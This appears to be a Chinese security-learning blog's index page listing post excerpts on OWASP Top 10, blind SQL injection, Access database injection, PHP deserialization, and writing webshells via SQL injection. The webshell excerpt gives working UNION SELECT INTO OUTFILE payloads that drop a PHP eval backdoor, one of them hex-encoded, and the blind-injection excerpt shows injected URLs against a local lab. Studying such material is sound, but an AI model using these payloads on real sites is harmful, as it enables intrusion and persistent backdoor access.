TypechoJoeTheme

学习使用

统计
登录
用户名
密码
搜索到 15 篇与 的结果 ———
2022-01-20

OWASP Top 10

OWASP Top 10
A01:2021-失效的访问控制 Broken Access Control从第5位上升成为Web应用程序安全风险最严重的类别;提供的数据表明,平均3.81%的测试应用程序具有一个或多个CWE,且此类风险中CWE总发生漏洞应用数超过31.8万次。在应用程序中出现的34个匹配为“失效的访问控制”的CWE次数比任何其他类别都多A02:2021-加密机制失效 Cryptographic Failures排名上升一位。其以前被称为“A3:2017-敏感信息泄漏(Sensitive Data Exposure)”。敏感信息泄漏是常见的症状,而非根本原因。更新后的名称侧重于与密码学相关的风险,即之前已经隐含的根本原因。此类风险通常会导致敏感数据泄露或系统被攻破。A03:2021-注入 Injection排名下滑两位。94%的应用程序进行了某种形式的注入风险测试,发生安全事件的最大率为19%,平均率为3.37%,匹配到此类别的33个CWE共发生27.4万次,是出现第二多的风险类别。原“A07:2017-跨站脚本(XSS)”在2021年版中被纳入此风险类别。A04:2021-不安全设计 I...
admin
2022-01-20

WEB漏洞,WEB

844 阅读
0 评论
2022年01月20日
844 阅读
0 评论
2022-01-07

盲注详解

盲注详解
{lamp/}盲注SQL注入类型​布尔型盲注时间延迟型盲注​报错型盲注其他报错函数​DNSlog快速注入{lamp/}     一、布尔盲注“布尔盲注”又称布尔判断,指的是利用SQL语句逻辑与(and)操作,判断and两边的条件是否成立,SQL语句带入数据库查询后判断返回内容(通常返回值仅有非空和空两种状态),类似布尔型的true和false的两种状态;看具体函数使用,要求必须掌握left、substr、ascii、regexp、like函数用法;▲left(user())>’10’ ​ user()显示当前数据库用户,length统计字符长度。示例:http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(user())>20 --+http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(user())=14 --+▲left(user(),1)>’s’ //left()函数user()显示当前数据库用户,le...
admin
2022-01-07

WEB漏洞,SQL注入

2,191 阅读
2 评论
2022年01月07日
2,191 阅读
2 评论
2022-01-01

其他数据库注入

其他数据库注入
{lamp/}Access数据库注入Microsoft Office Access 是由微软发布的关系数据库管理系统。小巧而灵活,是Windows下小型C/S系统和网站B/S不错的选择。Access的用途体现在两个方面:一、用来进行数据分析: Access有强大的数据处理、统计分析能力,利用access的查询功能,可以方便地进行各类汇总、平均等统计;二、用来开发软件: Access用来开发软件,比如生产管理、销售管理、库存管理等各类企业管理软件,在开发一些小型网站WEB应用程序时,用来存储数据。例如ASP+Access判断数据库类型根据url的后缀。ASP为后缀名的是ACCESS数据库在url后面加单引号,以报错信息“Microsoft ole db provider for odbc drivers”判断为access通过and (select count(*) from msysobjects)>0发生错误页面则为access数据库。msysobjects、msysqueries\msysrelationships为access的三个系统表,web环境下没有权限...
admin
2022-01-01

WEB漏洞,SQL注入

1,245 阅读
0 评论
2022年01月01日
1,245 阅读
0 评论
2021-12-24

SQL注入写webshell

SQL注入写webshell
一、MySQL写shell写入WebShell的几种方式1、利用Union select 写入需要满足的条件对web目录有写权限GPC关闭(GPC:是否对单引号转义)有绝对路径(读文件可以不用,写文件需要)没有配置secure-file-priv?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'D:/WWW/evil.php' ?id=1 union select 1,0x223c3f70687020406576616c28245f504f53545b2767275d293b3f3e22,3 into outfile "D:/WWW/evil.php"2、利用分隔符写入?id=1 into outfile 'D:/WWW/evil.php' fie...
admin
2021-12-24

WEB漏洞,SQL注入

2,329 阅读
0 评论
2021年12月24日
2,329 阅读
0 评论
2021-12-23

反序列化漏洞

反序列化漏洞
反序列化漏洞反序列化就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。序列化说通俗点就是把一个对象变成可以传输的字符串。序列化和反序列化本身没有问题,但是如果反序列化的内容是用户可以控制的,且后台不正当的使用了PHP中的魔法函数,就会导致安全问题serialize()unserialize()__construct()对象创建时被调用__destruct()对象销毁时被调用__toString()对象被当作一个字符串使用__sleep()对象在被序列化之前运行,使用serialize时触发__wakeup序列化之后立即被调用,使用unserialize时触发危害命令执行代码执行文件读取基础知识面向对象概念​ Object-oriented programming(缩写:OOP), 对象是一个由信息及对信息进行处理的描述所组成的整体,是对现实世界的抽象!在现实世界里我们所面对的事情都是对象,如计算机、车等!对象的主要三个特性:对象的行为:可以对 对象施加那些操作,开灯,关灯就是行为。对象的形态:当施加那些方法是对象如何响应,颜色,尺寸,外型。对象的表示:对...
admin
2021-12-23

WEB漏洞,反序列化

1,747 阅读
0 评论
2021年12月23日
1,747 阅读
0 评论